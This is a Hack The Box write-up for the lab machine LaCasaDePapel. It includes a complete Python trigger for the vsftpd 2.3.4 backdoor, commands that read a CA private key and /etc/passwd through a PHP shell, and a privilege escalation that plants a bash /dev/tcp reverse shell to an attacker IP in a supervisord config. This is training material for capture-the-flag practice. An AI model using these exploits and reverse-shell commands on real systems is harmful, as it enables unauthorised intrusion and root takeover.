HTB - LaCasaDePapel
Getting Root:
Tools Used:
Nmap
Enumeration
FTP - Port 21
#!/usr/bin/python3
import socket
import sys
import time
def exploit(ip):
""" Triggers vsftpd 2.3.4 backdoor """
try:
print('[*] Attempting to trigger backdoor...')
ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ftp_socket.connect((ip, 21))
# Attempt to login to trigger backdoor
ftp_socket.send(b'USER letmein:)\n')
ftp_socket.send(b'PASS please\n')
time.sleep(2)
ftp_socket.close()
print('[+] Triggered backdoor')
except Exception:
print('[!] Failed to trigger backdoor on %s' % ip)
if __name__ == '__main__':
if len(sys.argv) < 2:
print('Usage: ./vsftpd_234_exploit.py <IP address>')
print('Example: ./vsftpd_234_exploit.py 192.168.1.10')
else:
exploit(sys.argv[1]) python3 vsftpd_234_exploit.py 10.10.10.131
[*] Attempting to trigger backdoor...
[+] Triggered backdoor Port 6200
rlwrap telnet 10.10.10.131 6200
Trying 10.10.10.131...
Connected to 10.10.10.131.
Escape character is '^]'.
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman
scandir(".")
=> [
".",
"..",
".DS_Store",
"._.DS_Store",
"bin",
"boot",
"dev",
"etc",
"home",
"lib",
"lost+found",
"media",
"mnt",
"opt",
"proc",
"root",
"run",
"sbin",
"srv",
"swap",
"sys",
"tmp",
"usr",
"var",
]
scandir("/home")
=> [
".",
"..",
"berlin",
"dali",
"nairobi",
"oslo",
"professor",
]
ls
Variables: $tokyo
show $tokyo
> 2| class Tokyo {
3| private function sign($caCert,$userCsr) {
4| $caKey = file_get_contents('/home/nairobi/ca.key');
5| $userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
6| openssl_x509_export($userCert, $userCertOut);
7| return $userCertOut;
8| }
9| }
file_get_contents("/home/nairobi/ca.key")
=> """
-----BEGIN PRIVATE KEY-----\n
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb\n
7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/\n
2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl\n
uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M\n
YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp\n
s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us\n
PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V\n
Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89\n
1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ\n
/CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+\n
q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr\n
uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd\n
I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og\n
7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE\n
G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn\n
sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH\n
CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y\n
sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI\n
ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2\n
zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/\n
ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC\n
9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M\n
WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM\n
7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR\n
aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc\n
53udBEzjt3WPqYGkkDknVhjD\n
-----END PRIVATE KEY-----\n
"""
file_get_contents("/etc/passwd")
=> """
root:x:0:0:root:/root:/bin/ash\n
bin:x:1:1:bin:/bin:/sbin/nologin\n
daemon:x:2:2:daemon:/sbin:/sbin/nologin\n
adm:x:3:4:adm:/var/adm:/sbin/nologin\n
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n
sync:x:5:0:sync:/sbin:/bin/sync\n
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n
halt:x:7:0:halt:/sbin:/sbin/halt\n
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin\n
news:x:9:13:news:/usr/lib/news:/sbin/nologin\n
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin\n
operator:x:11:0:operator:/root:/bin/sh\n
man:x:13:15:man:/usr/man:/sbin/nologin\n
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin\n
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin\n
ftp:x:21:21::/var/lib/ftp:/sbin/nologin\n
sshd:x:22:22:sshd:/dev/null:/sbin/nologin\n
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin\n
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin\n
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin\n
games:x:35:35:games:/usr/games:/sbin/nologin\n
postgres:x:70:70::/var/lib/postgresql:/bin/sh\n
cyrus:x:85:12::/usr/cyrus:/sbin/nologin\n
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin\n
ntp:x:123:123:NTP:/var/empty:/sbin/nologin\n
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin\n
guest:x:405:100:guest:/dev/null:/sbin/nologin\n
nobody:x:65534:65534:nobody:/:/sbin/nologin\n
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin\n
dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh\n
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash\n
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash\n
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin\n
memcached:x:102:102:memcached:/home/memcached:/sbin/nologin\n
"""
HTTPS
We get certificate error
Creating a certificate so that we can access the https site
# Connecting to the site to check it out
# openssl s_client -connect lacasadepapel.htb:443
CONNECTED(00000003)
depth=0 CN = 'lacasadepapel.htb', O = 'La Casa De Papel'
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = 'lacasadepapel.htb', O = 'La Casa De Papel'
verify return:1
---
Certificate chain
0 s:CN = lacasadepapel.htb, O = La Casa De Papel
i:CN = lacasadepapel.htb, O = La Casa De Papel
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIC6jCCAdICCQDISiE8M6B29jANBgkqhkiG9w0BAQsFADA3MRowGAYDVQQDDBFs
YWNhc2FkZXBhcGVsLmh0YjEZMBcGA1UECgwQTGEgQ2FzYSBEZSBQYXBlbDAeFw0x
OTAxMjcwODM1MzBaFw0yOTAxMjQwODM1MzBaMDcxGjAYBgNVBAMMEWxhY2FzYWRl
cGFwZWwuaHRiMRkwFwYDVQQKDBBMYSBDYXNhIERlIFBhcGVsMIIBIjANBgkqhkiG
9w0BAQEFAAOCAQ8AMIIBCgKCAQEAz3M6VN7OD5sHW+zCbIv/5vJpuaxJF3A5q2rV
QJNqU1sFsbnaPxRbFgAtc8hVeMNii2nCFO8PGGs9P9pvoy8e8DR9ksBQYyXqOZZ8
/rsdxwfjYVgv+a3UbJNO4e9Sd3b8GL+4XIzzSi3EZbl7dlsOhl4+KB4cM4hNhE5B
4K8UKe4wfKS/ekgyCRTRENVqqd3izZzz232yyzFvDGEOFJVzmhlHVypqsfS9rKUV
ESPHczaEQld3kupVrt/mBqwuKe99sluQzORqO1xMqbNgb55ZD66vQBSkN2PwBeiR
PBRNXfnWla3Gkabukpu9xR9o+l7ut13PXdQ/fPflLDwnu5wMZwIDAQABMA0GCSqG
SIb3DQEBCwUAA4IBAQCuo8yzORz4pby9tF1CK/4cZKDYcGT/wpa1v6lmD5CPuS+C
hXXBjK0gPRAPhpF95DO7ilyJbfIc2xIRh1cgX6L0ui/SyxaKHgmEE8ewQea/eKu6
vmgh3JkChYqvVwk7HRWaSaFzOiWMKUU8mB/7L95+mNU7DVVUYB9vaPSqxqfX6ywx
BoJEm7yf7QlJTH3FSzfew1pgMyPxx0cAb5ctjQTLbUj1rcE9PgcSki/j9WyJltkI
EqSngyuJEu3qYGoM0O5gtX13jszgJP+dA3vZ1wqFjKlWs2l89pb/hwRR2raqDwli
MgnURkjwvR1kalXCvx9cST6nCkxF2TxlmRpyNXy4
-----END CERTIFICATE-----
subject=CN = lacasadepapel.htb, O = La Casa De Papel
issuer=CN = lacasadepapel.htb, O = La Casa De Papel
---
# openssl req -x509 -new -nodes -key CAbull/ca.key -sha256 -days 356 -out CAbull/squid22.pem
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:La Casa De Papel
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:lacasadepapel.htb
Email Address []:
# openssl pkcs12 -export -in squid22.pem -inkey ca.key -out squid22.p12
Enter Export Password:
Verifying - Enter Export Password:
Importing the certificate to the browser
Verifying the file
# file id_rsa
id_rsa: OpenSSH private key
Privilege Escalation
There is file named memcached.ini owned by root in the home directory of user professor.
lacasadepapel [~]$ ls -la
total 24
drwxr-sr-x 4 professo professo 4096 Mar 6 2019 .
drwxr-xr-x 7 root root 4096 Feb 16 2019 ..
lrwxrwxrwx 1 root professo 9 Nov 6 2018 .ash_history -> /dev/null
drwx------ 2 professo professo 4096 Jan 31 2019 .ssh
-rw-r--r-- 1 root root 88 Jan 29 2019 memcached.ini
-rw-r----- 1 root nobody 434 Jan 29 2019 memcached.js
drwxr-sr-x 9 root professo 4096 Jan 29 2019 node_modules
lacasadepapel [~]$
Contents of the memcached.ini file
cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.jsUsing pspy64, we can see that something access this file and executes the command.
2020/04/12 06:06:02 FS: OPEN | /etc/supervisord.conf
2020/04/12 06:06:02 FS: ACCESS | /etc/supervisord.conf
2020/04/12 06:06:02 FS: ACCESS | /etc/supervisord.conf
2020/04/12 06:06:02 FS: OPEN DIR | /home/professor
2020/04/12 06:06:02 FS: OPEN DIR | /home/professor/
2020/04/12 06:06:02 FS: ACCESS DIR | /home/professor
2020/04/12 06:06:02 FS: ACCESS DIR | /home/professor/
2020/04/12 06:06:02 FS: ACCESS DIR | /home/professor
2020/04/12 06:06:02 FS: ACCESS DIR | /home/professor/
2020/04/12 06:06:02 FS: CLOSE_NOWRITE DIR | /home/professor
2020/04/12 06:06:02 FS: CLOSE_NOWRITE DIR | /home/professor/
2020/04/12 06:06:02 FS: OPEN | /home/professor/memcached.ini
2020/04/12 06:06:02 FS: ACCESS | /home/professor/memcached.ini
2020/04/12 06:06:02 FS: ACCESS | /home/professor/memcached.ini
2020/04/12 06:06:02 FS: CLOSE_NOWRITE | /home/professor/memcached.ini
2020/04/12 06:06:02 FS: OPEN | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.py
2020/04/12 06:06:02 FS: OPEN | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.pyc
2020/04/12 06:06:02 FS: ACCESS | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.pyc
2020/04/12 06:06:02 FS: CLOSE_NOWRITE | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.pyc
2020/04/12 06:06:02 FS: CLOSE_NOWRITE | /usr/lib/python2.7/site-packages/supervisor/rpcinterface.py
2020/04/12 06:06:02 FS: CLOSE_NOWRITE | /etc/supervisord.conf
2020/04/12 06:06:02 FS: OPEN | /etc/passwd
2020/04/12 06:06:02 FS: ACCESS | /etc/passwd
2020/04/12 06:06:02 FS: CLOSE_NOWRITE | /etc/passwd
2020/04/12 06:06:02 FS: OPEN | /etc/passwd
2020/04/12 06:06:02 FS: ACCESS | /etc/passwd
2020/04/12 06:06:02 FS: CLOSE_NOWRITE | /etc/passwd
2020/04/12 06:06:02 FS: OPEN | /etc/passwd
2020/04/12 06:06:02 FS: ACCESS | /etc/passwd
2020/04/12 06:06:02 FS: CLOSE_NOWRITE | /etc/passwd
2020/04/12 06:07:04 FS: OPEN | /var/log/messages
2020/04/12 06:07:04 FS: MODIFY | /var/log/messages
2020/04/12 06:07:04 CMD: UID=0 PID=22236 | sudo -u nobody /usr/bin/node /home/professor/memcached.js
2020/04/12 06:07:04 FS: CLOSE_NOWRITE | /etc/sudoers
2020/04/12 06:07:04 FS: OPEN | /etc/passwd
2020/04/12 06:07:04 FS: ACCESS | /etc/passwd # We can't edit the file but we can rename it
lacasadepapel [~]$ mv memcached.ini memcached.ini.bkp
# We add a reverse shell to the file
lacasadepapel [~]$ echo "[program:memcached]" > memcached.ini
lacasadepapel [~]$ echo 'command = bash -c "bash -i >& /dev/tcp/10.10.14.27/1337 0>&1"' >> memcached.ini
# verify the contents of the file
cat memcached.ini
[program:memcached]
command = bash -c "bash -i >& /dev/tcp/10.10.14.27/1337 0>&1"
We get a shell as root
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.131.
Ncat: Connection from 10.10.10.131:52718.
bash: cannot set terminal process group (23063): Not a tty
bash: no job control in this shell
bash-4.4# id
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
bash-4.4#
Last updated
